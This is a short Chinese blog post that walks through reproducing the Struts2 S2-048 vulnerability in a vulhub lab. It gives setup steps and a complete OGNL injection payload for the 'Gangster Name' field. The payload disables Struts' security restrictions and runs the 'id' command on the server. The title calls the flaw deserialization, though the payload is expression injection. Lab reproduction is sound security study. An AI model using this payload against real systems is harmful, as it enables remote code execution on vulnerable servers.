Struts2反序列化漏洞复现

环境: vulhub

环境搭建

进入s2-048目录

 切换root用户

 启动漏洞环境 docker-compose up -d

漏洞复现

 浏览器访问 showcase

 

Gangster Name输入 ${233*233} , 其余随便填

 

将Gangster Name输入一下payload , 其余随便填

%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#q=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('id').getInputStream())).(#q)}

 

• « 上一篇：计算机格式化后数据恢复的基础,电脑硬盘格式化后数据能恢复吗
• » 下一篇：快速排序（Quick sort）